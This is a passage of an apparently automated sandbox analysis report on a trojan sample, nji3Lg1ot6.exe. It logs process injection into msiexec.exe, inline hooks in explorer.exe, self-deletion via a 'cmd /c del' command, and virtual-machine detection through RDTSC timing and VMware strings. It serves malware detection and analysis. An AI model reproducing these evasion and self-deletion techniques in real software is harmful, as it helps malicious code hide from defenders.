          Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\nji3Lg1ot6.exe"
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeProcess created: C:\Users\user\Desktop\nji3Lg1ot6.exe "C:\Users\user\Desktop\nji3Lg1ot6.exe"
          Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\nji3Lg1ot6.exe"
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeFile created: C:\Users\user\AppData\Local\Temp\nsx7FAD.tmpJump to behavior
          Source: classification engineClassification label: mal100.troj.evad.winEXE@8/4@4/4
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 0_2_00402012 CoCreateInstance,MultiByteToWideChar,
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 0_2_00404275 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5352:120:WilError_01
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: Binary string: msiexec.pdb source: nji3Lg1ot6.exe, 00000001.00000002.345417642.0000000000EA0000.00000040.00020000.sdmp
          Source: Binary string: msiexec.pdbGCTL source: nji3Lg1ot6.exe, 00000001.00000002.345417642.0000000000EA0000.00000040.00020000.sdmp
          Source: Binary string: wntdll.pdbUGP source: nji3Lg1ot6.exe, 00000000.00000003.294014026.0000000003090000.00000004.00000001.sdmp, nji3Lg1ot6.exe, 00000000.00000003.290725743.0000000003220000.00000004.00000001.sdmp, nji3Lg1ot6.exe, 00000001.00000002.345001948.0000000000A00000.00000040.00000001.sdmp, nji3Lg1ot6.exe, 00000001.00000002.345127293.0000000000B1F000.00000040.00000001.sdmp, msiexec.exe, 00000007.00000002.562611430.0000000004680000.00000040.00000001.sdmp, msiexec.exe, 00000007.00000002.562834721.000000000479F000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: nji3Lg1ot6.exe, nji3Lg1ot6.exe, 00000001.00000002.345001948.0000000000A00000.00000040.00000001.sdmp, nji3Lg1ot6.exe, 00000001.00000002.345127293.0000000000B1F000.00000040.00000001.sdmp, msiexec.exe, msiexec.exe, 00000007.00000002.562611430.0000000004680000.00000040.00000001.sdmp, msiexec.exe, 00000007.00000002.562834721.000000000479F000.00000040.00000001.sdmp
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 0_2_72FB1000 push eax; ret
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_0041E9E6 push edx; ret
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00416B6D push ebx; ret
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_0041D4F2 push eax; ret
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_0041D4FB push eax; ret
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_0041D4A5 push eax; ret
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_0041D55C push eax; ret
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_0041EEB5 push esi; ret
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 1_2_00A7D0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_046FD0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_006DE9E6 push edx; ret
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_006D6B6D push ebx; ret
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_006DD4FB push eax; ret
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_006DD4F2 push eax; ret
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_006DD4A5 push eax; ret
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_006DD55C push eax; ret
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_006DEEB5 push esi; ret
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeCode function: 0_2_00405DA3 GetModuleHandleA,LoadLibraryA,GetProcAddress,
          Source: C:\Users\user\Desktop\nji3Lg1ot6.exeFile created: C:\Users\user\AppData\Local\Temp\nsx7FAF.tmp\mtmmtvzho.dllJump to dropped file

          Hooking and other Techniques for Hiding and Protection:

Modifies the prolog of user mode functions (user mode inline hooks)
Source: explorer.exe | User mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x85 0x5E 0xE0
Self deletion via cmd delete
Source: C:\Windows\SysWOW64\msiexec.exe | Process created: /c del "C:\Users\user\Desktop\nji3Lg1ot6.exe"
Source: C:\Windows\SysWOW64\msiexec.exe | Process created: /c del "C:\Users\user\Desktop\nji3Lg1ot6.exe"
Source: C:\Users\user\Desktop\nji3Lg1ot6.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\msiexec.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\Desktop\nji3Lg1ot6.exe | RDTSC instruction interceptor: First address: 0000000000409904 second address: 000000000040990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\nji3Lg1ot6.exe | RDTSC instruction interceptor: First address: 0000000000409B6E second address: 0000000000409B74 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\explorer.exe TID: 6788 | Thread sleep time: -56000s >= -30000s
Source: C:\Windows\SysWOW64\msiexec.exe TID: 6720 | Thread sleep time: -46000s >= -30000s
Source: C:\Windows\explorer.exe | Last function: Thread delayed
Source: C:\Windows\explorer.exe | Last function: Thread delayed
Source: C:\Windows\SysWOW64\msiexec.exe | Last function: Thread delayed
Source: C:\Windows\SysWOW64\msiexec.exe | Last function: Thread delayed
Source: C:\Users\user\Desktop\nji3Lg1ot6.exe | Code function: 1_2_00409AA0 rdtsc
Source: C:\Users\user\Desktop\nji3Lg1ot6.exe | API coverage: 7.9 %
Source: C:\Windows\SysWOW64\msiexec.exe | API coverage: 7.4 %
Source: C:\Users\user\Desktop\nji3Lg1ot6.exe | Process information queried: ProcessInformation
Source: C:\Users\user\Desktop\nji3Lg1ot6.exe | Code function: 0_2_00405D7C FindFirstFileA,FindClose,
Source: C:\Users\user\Desktop\nji3Lg1ot6.exe | Code function: 0_2_004053AA CloseHandle,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,
Source: C:\Users\user\Desktop\nji3Lg1ot6.exe | Code function: 0_2_00402630 FindFirstFileA,
Source: C:\Users\user\Desktop\nji3Lg1ot6.exe | API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\nji3Lg1ot6.exe | API call chain: ExitProcess graph end node
Source: explorer.exe, 00000003.00000000.330096852.00000000086C9000.00000004.00000001.sdmp | Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000003.00000000.303384073.0000000008778000.00000004.00000001.sdmp | Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000}
Source: explorer.exe, 00000003.00000000.327963401.00000000067C2000.00000004.00000001.sdmp | Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000003.00000000.330096852.00000000086C9000.00000004.00000001.sdmp | Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}&
Source: explorer.exe, 00000003.00000000.327963401.00000000067C2000.00000004.00000001.sdmp | Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000m32)
Source: explorer.exe, 00000003.00000000.330096852.00000000086C9000.00000004.00000001.sdmp | Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
Source: C:\Users\user\Desktop\nji3Lg1ot6.exe | Code function: 0_2_00405DA3 GetModuleHandleA,LoadLibraryA,GetProcAddress,
Source: C:\Users\user\Desktop\nji3Lg1ot6.exe | Code function: 1_2_00409AA0 rdtsc
Source: C:\Users\user\Desktop\nji3Lg1ot6.exe | Process token adjusted: Debug
Source: C:\Users\user\Desktop\nji3Lg1ot6.exe | Code function: 0_2_0019EB1E mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\nji3Lg1ot6.exe | Code function: 0_2_0019E90A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\nji3Lg1ot6.exe | Code function: 0_2_0019EC4C mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\nji3Lg1ot6.exe | Code function: 0_2_0019EBCF mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\nji3Lg1ot6.exe | Code function: 0_2_0019EC0E mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\nji3Lg1ot6.exe | Code function: 1_2_00A520A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\nji3Lg1ot6.exe | Code function: 1_2_00A520A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\nji3Lg1ot6.exe | Code function: 1_2_00A520A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\nji3Lg1ot6.exe | Code function: 1_2_00A520A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\nji3Lg1ot6.exe | Code function: 1_2_00A520A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\nji3Lg1ot6.exe | Code function: 1_2_00A520A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\nji3Lg1ot6.exe | Code function: 1_2_00A690AF mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\nji3Lg1ot6.exe | Code function: 1_2_00A5F0BF mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\nji3Lg1ot6.exe | Code function: 1_2_00A5F0BF mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\nji3Lg1ot6.exe | Code function: 1_2_00A5F0BF mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\nji3Lg1ot6.exe | Code function: 1_2_00A29080 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\nji3Lg1ot6.exe | Code function: 1_2_00AA3884 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\nji3Lg1ot6.exe | Code function: 1_2_00AA3884 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\nji3Lg1ot6.exe | Code function: 1_2_00A4B8E4 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\nji3Lg1ot6.exe | Code function: 1_2_00A4B8E4 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\nji3Lg1ot6.exe | Code function: 1_2_00A240E1 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\nji3Lg1ot6.exe | Code function: 1_2_00A240E1 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\nji3Lg1ot6.exe | Code function: 1_2_00A240E1 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\nji3Lg1ot6.exe | Code function: 1_2_00A258EC mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\nji3Lg1ot6.exe | Code function: 1_2_00ABB8D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\nji3Lg1ot6.exe | Code function: 1_2_00ABB8D0 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\nji3Lg1ot6.exe | Code function: 1_2_00ABB8D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\nji3Lg1ot6.exe | Code function: 1_2_00ABB8D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\nji3Lg1ot6.exe | Code function: 1_2_00ABB8D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\nji3Lg1ot6.exe | Code function: 1_2_00ABB8D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\nji3Lg1ot6.exe | Code function: 1_2_00A5002D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\nji3Lg1ot6.exe | Code function: 1_2_00A5002D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\nji3Lg1ot6.exe | Code function: 1_2_00A5002D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\nji3Lg1ot6.exe | Code function: 1_2_00A5002D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\nji3Lg1ot6.exe | Code function: 1_2_00A5002D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\nji3Lg1ot6.exe | Code function: 1_2_00A3B02A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\nji3Lg1ot6.exe | Code function: 1_2_00A3B02A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\nji3Lg1ot6.exe | Code function: 1_2_00A3B02A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\nji3Lg1ot6.exe | Code function: 1_2_00A3B02A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\nji3Lg1ot6.exe | Code function: 1_2_00A4A830 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\nji3Lg1ot6.exe | Code function: 1_2_00A4A830 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\nji3Lg1ot6.exe | Code function: 1_2_00A4A830 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\nji3Lg1ot6.exe | Code function: 1_2_00A4A830 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\nji3Lg1ot6.exe | Code function: 1_2_00AF4015 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\nji3Lg1ot6.exe | Code function: 1_2_00AF4015 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\nji3Lg1ot6.exe | Code function: 1_2_00AA7016 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\nji3Lg1ot6.exe | Code function: 1_2_00AA7016 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\nji3Lg1ot6.exe | Code function: 1_2_00AA7016 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\nji3Lg1ot6.exe | Code function: 1_2_00AF1074 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\nji3Lg1ot6.exe | Code function: 1_2_00AE2073 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\nji3Lg1ot6.exe | Code function: 1_2_00A40050 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\nji3Lg1ot6.exe | Code function: 1_2_00A40050 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\nji3Lg1ot6.exe | Code function: 1_2_00A561A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\nji3Lg1ot6.exe | Code function: 1_2_00A561A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\nji3Lg1ot6.exe | Code function: 1_2_00AE49A4 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\nji3Lg1ot6.exe | Code function: 1_2_00AE49A4 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\nji3Lg1ot6.exe | Code function: 1_2_00AE49A4 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\nji3Lg1ot6.exe | Code function: 1_2_00AE49A4 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\nji3Lg1ot6.exe | Code function: 1_2_00AA69A6 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\nji3Lg1ot6.exe | Code function: 1_2_00AA51BE mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\nji3Lg1ot6.exe | Code function: 1_2_00AA51BE mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\nji3Lg1ot6.exe | Code function: 1_2_00AA51BE mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\nji3Lg1ot6.exe | Code function: 1_2_00AA51BE mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\nji3Lg1ot6.exe | Code function: 1_2_00A499BF mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\nji3Lg1ot6.exe | Code function: 1_2_00A499BF mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\nji3Lg1ot6.exe | Code function: 1_2_00A499BF mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\nji3Lg1ot6.exe | Code function: 1_2_00A499BF mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\nji3Lg1ot6.exe | Code function: 1_2_00A499BF mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\nji3Lg1ot6.exe | Code function: 1_2_00A499BF mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\nji3Lg1ot6.exe | Code function: 1_2_00A499BF mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\nji3Lg1ot6.exe | Code function: 1_2_00A499BF mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\nji3Lg1ot6.exe | Code function: 1_2_00A499BF mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\nji3Lg1ot6.exe | Code function: 1_2_00A499BF mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\nji3Lg1ot6.exe | Code function: 1_2_00A499BF mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\nji3Lg1ot6.exe | Code function: 1_2_00A499BF mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\nji3Lg1ot6.exe | Code function: 1_2_00A5A185 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\nji3Lg1ot6.exe | Code function: 1_2_00A4C182 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\nji3Lg1ot6.exe | Code function: 1_2_00A52990 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\nji3Lg1ot6.exe | Code function: 1_2_00A2B1E1 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\nji3Lg1ot6.exe | Code function: 1_2_00A2B1E1 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\nji3Lg1ot6.exe | Code function: 1_2_00A2B1E1 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\nji3Lg1ot6.exe | Code function: 1_2_00AB41E8 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\nji3Lg1ot6.exe | Code function: 1_2_00A44120 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\nji3Lg1ot6.exe | Code function: 1_2_00A44120 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\nji3Lg1ot6.exe | Code function: 1_2_00A44120 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\nji3Lg1ot6.exe | Code function: 1_2_00A44120 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\nji3Lg1ot6.exe | Code function: 1_2_00A44120 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\nji3Lg1ot6.exe | Code function: 1_2_00A5513A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\nji3Lg1ot6.exe | Code function: 1_2_00A5513A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\nji3Lg1ot6.exe | Code function: 1_2_00A29100 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\nji3Lg1ot6.exe | Code function: 1_2_00A29100 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\nji3Lg1ot6.exe | Code function: 1_2_00A29100 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\nji3Lg1ot6.exe | Code function: 1_2_00A2C962 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\nji3Lg1ot6.exe | Code function: 1_2_00A2B171 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\nji3Lg1ot6.exe | Code function: 1_2_00A2B171 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\nji3Lg1ot6.exe | Code function: 1_2_00A4B944 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\nji3Lg1ot6.exe | Code function: 1_2_00A4B944 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\nji3Lg1ot6.exe | Code function: 1_2_00A252A5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\nji3Lg1ot6.exe | Code function: 1_2_00A252A5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\nji3Lg1ot6.exe | Code function: 1_2_00A252A5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\nji3Lg1ot6.exe | Code function: 1_2_00A252A5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\nji3Lg1ot6.exe | Code function: 1_2_00A252A5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\nji3Lg1ot6.exe | Code function: 1_2_00A3AAB0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\nji3Lg1ot6.exe | Code function: 1_2_00A3AAB0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\nji3Lg1ot6.exe | Code function: 1_2_00A5FAB0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\nji3Lg1ot6.exe | Code function: 1_2_00A5D294 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\nji3Lg1ot6.exe | Code function: 1_2_00A5D294 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\nji3Lg1ot6.exe | Code function: 1_2_00A52AE4 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\nji3Lg1ot6.exe | Code function: 1_2_00A52ACB mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\nji3Lg1ot6.exe | Code function: 1_2_00A64A2C mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\nji3Lg1ot6.exe | Code function: 1_2_00A64A2C mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\nji3Lg1ot6.exe | Code function: 1_2_00A4A229 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\nji3Lg1ot6.exe | Code function: 1_2_00A4A229 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\nji3Lg1ot6.exe | Code function: 1_2_00A4A229 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\nji3Lg1ot6.exe | Code function: 1_2_00A4A229 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\nji3Lg1ot6.exe | Code function: 1_2_00A4A229 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\nji3Lg1ot6.exe | Code function: 1_2_00A4A229 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\nji3Lg1ot6.exe | Code function: 1_2_00A4A229 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\nji3Lg1ot6.exe | Code function: 1_2_00A4A229 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\nji3Lg1ot6.exe | Code function: 1_2_00A4A229 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\nji3Lg1ot6.exe | Code function: 1_2_00A38A0A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\nji3Lg1ot6.exe | Code function: 1_2_00A25210 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\nji3Lg1ot6.exe | Code function: 1_2_00A25210 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\nji3Lg1ot6.exe | Code function: 1_2_00A25210 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\nji3Lg1ot6.exe | Code function: 1_2_00A25210 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\nji3Lg1ot6.exe | Code function: 1_2_00A2AA16 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\nji3Lg1ot6.exe | Code function: 1_2_00A2AA16 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\nji3Lg1ot6.exe | Code function: 1_2_00A43A1C mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\nji3Lg1ot6.exe | Code function: 1_2_00AEAA16 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\nji3Lg1ot6.exe | Code function: 1_2_00AEAA16 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\nji3Lg1ot6.exe | Code function: 1_2_00ADB260 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\nji3Lg1ot6.exe | Code function: 1_2_00ADB260 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\nji3Lg1ot6.exe | Code function: 1_2_00AF8A62 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\nji3Lg1ot6.exe | Code function: 1_2_00A6927A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\nji3Lg1ot6.exe | Code function: 1_2_00A29240 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\nji3Lg1ot6.exe | Code function: 1_2_00A29240 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\nji3Lg1ot6.exe | Code function: 1_2_00A29240 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\nji3Lg1ot6.exe | Code function: 1_2_00A29240 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\nji3Lg1ot6.exe | Code function: 1_2_00AEEA55 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\nji3Lg1ot6.exe | Code function: 1_2_00AB4257 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\nji3Lg1ot6.exe | Code function: 1_2_00A54BAD mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\nji3Lg1ot6.exe | Code function: 1_2_00A54BAD mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\nji3Lg1ot6.exe | Code function: 1_2_00A54BAD mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\nji3Lg1ot6.exe | Code function: 1_2_00AF5BA5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\nji3Lg1ot6.exe | Code function: 1_2_00AE138A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\nji3Lg1ot6.exe | Code function: 1_2_00A31B8F mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\nji3Lg1ot6.exe | Code function: 1_2_00A31B8F mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\nji3Lg1ot6.exe | Code function: 1_2_00ADD380 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\nji3Lg1ot6.exe | Code function: 1_2_00A52397 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\nji3Lg1ot6.exe | Code function: 1_2_00A5B390 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\nji3Lg1ot6.exe | Code function: 1_2_00A503E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\nji3Lg1ot6.exe | Code function: 1_2_00A503E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\nji3Lg1ot6.exe | Code function: 1_2_00A503E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\nji3Lg1ot6.exe | Code function: 1_2_00A503E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\nji3Lg1ot6.exe | Code function: 1_2_00A503E2 mov eax, dword ptr fs:[00000030h]
